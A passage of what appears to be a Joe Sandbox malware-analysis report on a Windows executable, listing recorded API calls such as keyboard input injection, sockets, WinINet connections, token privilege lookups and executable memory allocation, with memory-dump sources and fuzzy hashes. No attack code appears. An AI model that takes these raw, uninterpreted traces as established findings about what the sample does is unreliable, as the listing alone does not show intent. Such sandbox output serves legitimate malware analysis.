                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: db61ed2719db1138da3980566bb7511984e2ac9f2bc0eaf56dc2acf08d7606b3
                                                                    • Instruction ID: b50fe62b68b70411283afb46eade65b4250ef3de0d25fe4e44c5ea285688042d
                                                                    • Opcode Fuzzy Hash: db61ed2719db1138da3980566bb7511984e2ac9f2bc0eaf56dc2acf08d7606b3
                                                                    • Instruction Fuzzy Hash: 41D01774510713CFEB30AF36D86860776E4AF0A255B12C87E9AC6DA950E6B9C4C0CB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: b73eb98e0d81e71e48318c2df3d551e57e00af45e7de83aef81db04959e734e3
                                                                    • Instruction ID: 36dabb3a8b86b1368145be736fe4a6917e30703db695cb7f8237b9092f018ac5
                                                                    • Opcode Fuzzy Hash: b73eb98e0d81e71e48318c2df3d551e57e00af45e7de83aef81db04959e734e3
                                                                    • Instruction Fuzzy Hash: ECD05B7180910DFACB18AAA09C8CCFE737CBB08201F040452F786D2244E23DC794D721
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca6618c45b98a17a860198018b6e612672167263d1bb4fda9d7480728d426565
                                                                    • Instruction ID: 7686dd5431c721fce9b2904f4ae8b4ba42e86d296dd1b89176280cb7221b202b
                                                                    • Opcode Fuzzy Hash: ca6618c45b98a17a860198018b6e612672167263d1bb4fda9d7480728d426565
                                                                    • Instruction Fuzzy Hash: 08C17074A00226EFDB14CF98C884EAEBBF5FF48714B148599E945EB251DB31ED81CB90
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0104E0BE
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0104E101
                                                                      • Part of subcall function 0104D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0104D7C5
                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0104E301
                                                                    • _memmove.LIBCMT ref: 0104E314
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                    • String ID:
                                                                    • API String ID: 3659485706-0
                                                                    • Opcode ID: 12769dd897dbcd5c3aadb5337bb862a5453f393c8a6de778c02e3c0213708538
                                                                    • Instruction ID: 5183cbbfa81da16440bfdf5841f0f0642f6fdc6da9bbde410505761304974ea4
                                                                    • Opcode Fuzzy Hash: 12769dd897dbcd5c3aadb5337bb862a5453f393c8a6de778c02e3c0213708538
                                                                    • Instruction Fuzzy Hash: A0C18AB1A08301DFC744DF28C48096ABBE5FF89714F04896EF9999B362D734E945CB82
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 010480C3
                                                                    • CoUninitialize.OLE32 ref: 010480CE
                                                                      • Part of subcall function 0102D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102D5D4
                                                                    • VariantInit.OLEAUT32(?), ref: 010480D9
                                                                    • VariantClear.OLEAUT32(?), ref: 010483AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: b0d11d85ed3c3fb63a7ef77feb6c38dd460454e9ef760aff4115edd82f790835
                                                                    • Instruction ID: 6a53beeebf1d5b83e01be05fc9f98ba69ff811efaae44fd40522032a5d1a9f0a
                                                                    • Opcode Fuzzy Hash: b0d11d85ed3c3fb63a7ef77feb6c38dd460454e9ef760aff4115edd82f790835
                                                                    • Instruction Fuzzy Hash: 19A15BB56047019FDB50EF94C880A2EB7E5BF89714F48885EFA959B3A1CB74ED00DB42
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01062C7C,?), ref: 010276EA
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01062C7C,?), ref: 01027702
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0105FB80,000000FF,?,00000000,00000800,00000000,?,01062C7C,?), ref: 01027727
                                                                    • _memcmp.LIBCMT ref: 01027748
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 65102b38eb1c2d1dc76ec47064a7d9da85bbf7dc55ce40775a965af14aad9b28
                                                                    • Instruction ID: cf77bfcaf2a5fc520d989a0c4c23cdec14c5993423bbedd46a3e5362a4434de3
                                                                    • Opcode Fuzzy Hash: 65102b38eb1c2d1dc76ec47064a7d9da85bbf7dc55ce40775a965af14aad9b28
                                                                    • Instruction Fuzzy Hash: 95814E71A00119EFCB04DFA8C988DEEB7B9FF89315F204598F545AB250DB71AE06CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: 436eee3398da8131e2a6fb74bdc5183a2561338e3dbb053fba2e4a33370cde4e
                                                                    • Instruction ID: f2312bd8bce420c4903e2ef8439e2f640a694de947b79506ed75c25874154817
                                                                    • Opcode Fuzzy Hash: 436eee3398da8131e2a6fb74bdc5183a2561338e3dbb053fba2e4a33370cde4e
                                                                    • Instruction Fuzzy Hash: AF51A6747043129ADB64AFAAD8A167EB7E9AF44310F14C81FE9C6C7291DF76D840CB01
                                                                    APIs
                                                                    • GetWindowRect.USER32(0151EFF0,?), ref: 01059863
                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 01059896
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01059903
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: e32d7893ab4f775df11353f3d447cdf30cc84f7dd57b5beee217e819259da9b2
                                                                    • Instruction ID: 228a651ee62c3dc7fa7b2bd857028b1eef799c1323c7a96bbaec58757d174e82
                                                                    • Opcode Fuzzy Hash: e32d7893ab4f775df11353f3d447cdf30cc84f7dd57b5beee217e819259da9b2
                                                                    • Instruction Fuzzy Hash: 37514F34A00209EFCF61CF68C884AAF7BF6FF45364F148199F9A59B291D731A941CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 01029AD2
                                                                    • __itow.LIBCMT ref: 01029B03
                                                                      • Part of subcall function 01029D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 01029DBE
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 01029B6C
                                                                    • __itow.LIBCMT ref: 01029BC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 5ece0cf8d83dbb2a0784ccca24588b26f7fd8546eb86f82c890aae9a023c44c8
                                                                    • Instruction ID: 83b6473e04fbb3d6e4f2163fd0ebd751f22fa45a082f9646ca8d18fc93a6ed00
                                                                    • Opcode Fuzzy Hash: 5ece0cf8d83dbb2a0784ccca24588b26f7fd8546eb86f82c890aae9a023c44c8
                                                                    • Instruction Fuzzy Hash: 1941B170A00328ABDF11EF54CC45BEE7BFAEF44714F44005AF945A7291DB749944CBA1
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 010469D1
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010469E1
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01046A45
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01046A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                    • String ID:
                                                                    • API String ID: 2214342067-0
                                                                    • Opcode ID: e8730dbbb1a8c8e3f35b801eed4c2992367ea35577d5e6c49c6b6fa25cdf543d
                                                                    • Instruction ID: a67dc588cb1a84d453baa34bc6348d40b69e27d96f697de95e18212aea9a093a
                                                                    • Opcode Fuzzy Hash: e8730dbbb1a8c8e3f35b801eed4c2992367ea35577d5e6c49c6b6fa25cdf543d
                                                                    • Instruction Fuzzy Hash: B741B2757002006FEB60BF68CC86F7E77E69B05B10F488059FA599B3C2DAB99D019B51
                                                                    APIs
                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0105F910), ref: 010464A7
                                                                    • _strlen.LIBCMT ref: 010464D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    • Opcode ID: efca22169640fd81e203bb410d55f8b11c77815e21f63ff85362ffc348ceea5a
                                                                    • Instruction ID: 0904b08a099badb213b49b57f8560af5666e578afbb2cd20688c3e56b643f4af
                                                                    • Opcode Fuzzy Hash: efca22169640fd81e203bb410d55f8b11c77815e21f63ff85362ffc348ceea5a
                                                                    • Instruction Fuzzy Hash: 2841F671500105ABCB10FBA8DCD5FFEB7A9AF45310F04816AF95697392EB35AD04D790
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0103B89E
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0103B8C4
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0103B8E9
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0103B915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010588DE
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0105AB60
                                                                    • GetWindowRect.USER32(?,?), ref: 0105ABD6
                                                                    • PtInRect.USER32(?,?,0105C014), ref: 0105ABE6
                                                                    • MessageBeep.USER32(00000000), ref: 0105AC57
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01030B27
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 01030B43
                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01030BA9
                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01030BFB
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 01030C66
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 01030C82
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 01030CE1
                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 01030D33
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010061FB
                                                                    • __isleadbyte_l.LIBCMT ref: 01006229
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 01006257
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0100628D
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 01054F02
                                                                      • Part of subcall function 01033641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0103365B
                                                                      • Part of subcall function 01033641: GetCurrentThreadId.KERNEL32 ref: 01033662
                                                                      • Part of subcall function 01033641: AttachThreadInput.USER32(00000000,?,01035005), ref: 01033669
                                                                    • GetCaretPos.USER32(?), ref: 01054F13
                                                                    • ClientToScreen.USER32(00000000,?), ref: 01054F4E
                                                                    • GetForegroundWindow.USER32 ref: 01054F54
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • GetCursorPos.USER32(?), ref: 0105C4D2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0100B9AB,?,?,?,?,?), ref: 0105C4E7
                                                                    • GetCursorPos.USER32(?), ref: 0105C534
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0100B9AB,?,?,?), ref: 0105C56E
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    APIs
                                                                      • Part of subcall function 0102810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01028121
                                                                      • Part of subcall function 0102810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0102812B
                                                                      • Part of subcall function 0102810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0102813A
                                                                      • Part of subcall function 0102810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01028141
                                                                      • Part of subcall function 0102810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01028157
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010286A3
                                                                    • _memcmp.LIBCMT ref: 010286C6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010286FC
                                                                    • HeapFree.KERNEL32(00000000), ref: 01028703
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    APIs
                                                                    • __setmode.LIBCMT ref: 00FF09AE
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50
                                                                    • _fprintf.LIBCMT ref: 00FF09E5
                                                                    • OutputDebugStringW.KERNEL32(?), ref: 01025DBB
                                                                      • Part of subcall function 00FF4AAA: _flsall.LIBCMT ref: 00FF4AC3
                                                                    • __setmode.LIBCMT ref: 00FF0A1A
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                    • String ID:
                                                                    • API String ID: 521402451-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010417A3
  • Part of subcall function 0104182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104184C
  • Part of subcall function 0104182D: InternetCloseHandle.WININET(00000000), ref: 010418E9
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 91168e2b1d40d4732be7325b28cb99f323179d3b73e013cd3e141d37e5004395
• Instruction ID: c7c0fd9061690fca2cc8b40b71d29a629276bdae7bd753f232de58cea0933057
• Opcode Fuzzy Hash: 91168e2b1d40d4732be7325b28cb99f323179d3b73e013cd3e141d37e5004395
• Instruction Fuzzy Hash: 272162B5200606BFEB129F64DC80FBBBBE9FF48710F10402EFA9596550DB75A45197A0
APIs
• GetFileAttributesW.KERNEL32(?,0105FAC0), ref: 01033A64
• GetLastError.KERNEL32 ref: 01033A73
• CreateDirectoryW.KERNEL32(?,00000000), ref: 01033A82
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0105FAC0), ref: 01033ADF
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 0e27cba276b936d8c6b6cfb30547bce7ace3c01b14be6335f22825b474db8f0a
• Instruction ID: 222cec878a6c720e698986d09e0f3c573432478cace1f263002a9afdd814df4e
• Opcode Fuzzy Hash: 0e27cba276b936d8c6b6cfb30547bce7ace3c01b14be6335f22825b474db8f0a
• Instruction Fuzzy Hash: 9221A3745087029F8310EF28C88586B7BE8BF85264F144A5EF4D9CB292EB35D94ACB43
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 01055D80
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 01055D9A
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 01055DA8
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01055DB6
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: e8405bad225d852c2fc70b8182af0e88f18fcee3af64e111766c37463e2064f4
• Instruction ID: 02c40e1831c54031d8c7b9da91b7d578b84e39ae4a3967da8838227ae8a60667
• Opcode Fuzzy Hash: e8405bad225d852c2fc70b8182af0e88f18fcee3af64e111766c37463e2064f4
• Instruction Fuzzy Hash: 2A11A232205111AFDB54AB55DC18FBB7799EF85320F084119F956C73D1C769AD01C7A4
APIs
• _free.LIBCMT ref: 01005101
  • Part of subcall function 00FF571C: __FF_MSGBANNER.LIBCMT ref: 00FF5733
